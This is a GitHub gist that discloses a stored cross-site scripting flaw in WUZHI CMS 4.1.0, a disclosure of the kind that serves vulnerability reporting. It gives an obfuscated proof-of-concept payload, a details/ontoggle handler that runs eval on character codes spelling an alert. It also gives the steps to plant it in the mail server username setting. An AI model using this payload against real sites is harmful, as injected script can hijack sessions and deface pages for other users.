Skip to content

Instantly share code, notes, and snippets.

@feixuezhi
Last active July 31, 2019 08:32
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save feixuezhi/7a1b117e1a4800efb3b6fffe76ca0e97 to your computer and use it in GitHub Desktop.
Save feixuezhi/7a1b117e1a4800efb3b6fffe76ca0e97 to your computer and use it in GitHub Desktop.
wuzhicms v4.1.0 persistent xss vulnerability
A persistent XSS vulnerability was discovered in WUZHI CMS 4.1.0
There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML.
POC
"> <details/open
/ontoggle=eval(String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(50)+String.fromCharCode(41))>
Vulnerability trigger point
http://localhost/index.php?m=core&f=index&_su=wuzhicms. When attacker access -system settings - mail server - mail server - mailbox username, write poc content, then XSS vulnerability is triggered successfully.
1、choose this part and write poc to [mailbox username]
2、submit and view webpage
@feixuezhi
Copy link
Author

b

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment